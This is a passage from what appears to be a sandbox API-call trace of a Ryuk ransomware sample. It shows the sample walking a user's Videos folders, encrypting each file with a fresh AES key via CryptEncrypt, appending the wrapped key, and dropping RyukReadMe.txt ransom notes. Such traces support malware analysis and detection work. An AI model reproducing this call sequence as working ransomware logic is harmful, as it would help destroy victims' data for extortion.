dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.544] GetLastError () returned 0x0 [0158.544] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0158.545] CloseHandle (hObject=0x18c) returned 1 [0158.545] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\ecut\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0158.545] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.545] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.545] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.545] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\ecut\\fN0JYTwb.swf", dwFileAttributes=0x80) returned 1 [0158.546] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\ecut\\fN0JYTwb.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\ecut\\fn0jytwb.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.546] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=83049) returned 1 [0158.546] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=83049) returned 1 [0158.546] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x14347, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.546] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0158.547] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.547] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0158.547] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.547] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.547] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x14469, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x14469, lpOverlapped=0x0) returned 1 [0158.548] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0158.548] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x14469, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x14470) returned 1 [0158.549] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.549] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x14470, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x14470, lpOverlapped=0x0) returned 1 [0158.549] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0158.549] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.549] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.549] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0158.549] CloseHandle (hObject=0x190) returned 1 [0158.573] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.578] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.578] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.578] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.578] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.578] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\ecut\\g4eixXJpgT.mp4", dwFileAttributes=0x80) returned 1 [0158.578] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\ecut\\g4eixXJpgT.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\ecut\\g4eixxjpgt.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.578] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=17435) returned 1 [0158.578] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=17435) returned 1 [0158.578] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x42f9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.579] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0158.579] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.579] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0158.579] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.579] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.579] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x441b, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x441b, lpOverlapped=0x0) returned 1 [0158.580] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0158.580] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x441b, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x4420) returned 1 [0158.580] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.580] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x4420, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x4420, lpOverlapped=0x0) returned 1 [0158.580] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0158.580] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.580] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.580] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0158.580] CloseHandle (hObject=0x190) returned 1 [0158.596] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.600] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.600] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.601] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.601] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.601] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\ecut\\pq6ydw0DKDlV3.mkv", dwFileAttributes=0x80) returned 1 [0158.601] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\ecut\\pq6ydw0DKDlV3.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\ecut\\pq6ydw0dkdlv3.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.601] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=62216) returned 1 [0158.601] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=62216) returned 1 [0158.601] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0xf1e6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.601] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0158.602] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.602] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0158.602] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.602] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.602] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0xf308, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0xf308, lpOverlapped=0x0) returned 1 [0158.603] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0158.603] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0xf308, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0xf310) returned 1 [0158.604] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.604] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xf310, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0xf310, lpOverlapped=0x0) returned 1 [0158.604] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0158.604] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.604] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.604] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0158.604] CloseHandle (hObject=0x190) returned 1 [0158.619] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.623] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.623] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.623] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.623] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.623] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\ecut\\zUqAv9rVIPq.flv", dwFileAttributes=0x80) returned 1 [0158.624] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\ecut\\zUqAv9rVIPq.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\ecut\\zuqav9rvipq.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x190 [0158.624] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac088 | out: lpFileSize=0x29ac088*=78176) returned 1 [0158.624] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x29ac098 | out: lpFileSize=0x29ac098*=78176) returned 1 [0158.624] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x1303e, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.624] ReadFile (in: hFile=0x190, lpBuffer=0x29ac0e8, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac0a8, lpOverlapped=0x0 | out: lpBuffer=0x29ac0e8*, lpNumberOfBytesRead=0x29ac0a8*=0x19, lpOverlapped=0x0) returned 1 [0158.625] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.625] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac070 | out: phKey=0x29ac070*=0x3b8690) returned 1 [0158.625] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.625] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.625] ReadFile (in: hFile=0x190, lpBuffer=0x2760000, nNumberOfBytesToRead=0x13160, lpNumberOfBytesRead=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac080*=0x13160, lpOverlapped=0x0) returned 1 [0158.626] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac07c*=0xf4250) returned 1 [0158.626] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac078*=0x13160, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac078*=0x13170) returned 1 [0158.626] SetFilePointer (in: hFile=0x190, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.626] WriteFile (in: hFile=0x190, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x13170, lpNumberOfBytesWritten=0x29ac080, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac080*=0x13170, lpOverlapped=0x0) returned 1 [0158.627] WriteFile (in: hFile=0x190, lpBuffer=0x29ac0c0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac0c0*, lpNumberOfBytesWritten=0x29ac084*=0x6, lpOverlapped=0x0) returned 1 [0158.627] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac090 | out: pbData=0x0*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.627] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac110, pdwDataLen=0x29ac090 | out: pbData=0x29ac110*, pdwDataLen=0x29ac090*=0x10c) returned 1 [0158.627] WriteFile (in: hFile=0x190, lpBuffer=0x29ac110*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac084, lpOverlapped=0x0 | out: lpBuffer=0x29ac110*, lpNumberOfBytesWritten=0x29ac084*=0x10c, lpOverlapped=0x0) returned 1 [0158.627] CloseHandle (hObject=0x190) returned 1 [0158.642] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.649] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.649] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.649] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0158.649] FindClose (in: hFindFile=0x3a2e80 | out: hFindFile=0x3a2e80) returned 1 [0158.649] SetLastError (dwErrCode=0x0) [0158.649] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\ecut\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\ecut\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.650] GetLastError () returned 0x0 [0158.650] WriteFile (in: hFile=0x18c, lpBuffer=0x13f108500*, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpBuffer=0x13f108500*, lpNumberOfBytesWritten=0x29aca40*=0x320, lpOverlapped=0x0) returned 1 [0158.650] CloseHandle (hObject=0x18c) returned 1 [0158.650] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0158.650] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.651] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\JRxfabF-gwgWkeBp jw.swf", dwFileAttributes=0x80) returned 1 [0158.651] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\JRxfabF-gwgWkeBp jw.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\jrxfabf-gwgwkebp jw.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.651] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac838 | out: lpFileSize=0x29ac838*=67128) returned 1 [0158.651] GetFileSizeEx (in: hFile=0x18c, lpFileSize=0x29ac848 | out: lpFileSize=0x29ac848*=67128) returned 1 [0158.651] SetFilePointerEx (in: hFile=0x18c, liDistanceToMove=0x10516, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0158.651] ReadFile (in: hFile=0x18c, lpBuffer=0x29ac898, nNumberOfBytesToRead=0x19, lpNumberOfBytesRead=0x29ac858, lpOverlapped=0x0 | out: lpBuffer=0x29ac898*, lpNumberOfBytesRead=0x29ac858*=0x19, lpOverlapped=0x0) returned 1 [0158.652] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.652] CryptGenKey (in: hProv=0x3add40, Algid=0x6610, dwFlags=0x1, phKey=0x29ac820 | out: phKey=0x29ac820*=0x3b8690) returned 1 [0158.652] VirtualAlloc (lpAddress=0x0, dwSize=0xf429a, flAllocationType=0x1000, flProtect=0x4) returned 0x2760000 [0158.652] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.652] ReadFile (in: hFile=0x18c, lpBuffer=0x2760000, nNumberOfBytesToRead=0x10638, lpNumberOfBytesRead=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesRead=0x29ac830*=0x10638, lpOverlapped=0x0) returned 1 [0158.653] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4240, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x29ac82c*=0xf4250) returned 1 [0158.653] CryptEncrypt (in: hKey=0x3b8690, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10638, dwBufLen=0xf4250 | out: pbData=0x2760000*, pdwDataLen=0x29ac828*=0x10640) returned 1 [0158.654] SetFilePointer (in: hFile=0x18c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0158.654] WriteFile (in: hFile=0x18c, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x10640, lpNumberOfBytesWritten=0x29ac830, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x29ac830*=0x10640, lpOverlapped=0x0) returned 1 [0158.654] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac870*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac870*, lpNumberOfBytesWritten=0x29ac834*=0x6, lpOverlapped=0x0) returned 1 [0158.654] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x0, pdwDataLen=0x29ac840 | out: pbData=0x0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.654] CryptExportKey (in: hKey=0x3b8690, hExpKey=0x3b8620, dwBlobType=0x1, dwFlags=0x0, pbData=0x29ac8c0, pdwDataLen=0x29ac840 | out: pbData=0x29ac8c0*, pdwDataLen=0x29ac840*=0x10c) returned 1 [0158.654] WriteFile (in: hFile=0x18c, lpBuffer=0x29ac8c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x29ac834, lpOverlapped=0x0 | out: lpBuffer=0x29ac8c0*, lpNumberOfBytesWritten=0x29ac834*=0x10c, lpOverlapped=0x0) returned 1 [0158.654] CloseHandle (hObject=0x18c) returned 1 [0158.669] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.673] CryptDestroyKey (hKey=0x3b8690) returned 1 [0158.673] VirtualFree (lpAddress=0x110000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.673] FindNextFileW (in: hFindFile=0x3a2e20, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0158.673] SetLastError (dwErrCode=0x0) [0158.673] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\RyukReadMe.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\jvnvflqdmhouqgzy0uw\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x18c [0158.674] GetLastError () returned 0xb7 [0158.674] CloseHandle (hObject=0x18c) returned 1 [0158.674] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3a2e80 [0158.674] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.674] FindNextFileW (in: hFindFile=0x3a2e80, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0158.674] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x110000 [0158.674] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\jVnvFLQdmhOuQgZy0UW\\R6X_zgdSkQzo JLKi0\\0Q_x5IE_.flv", dwFileAttributes=0x80) returned 1 [0158.674] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS 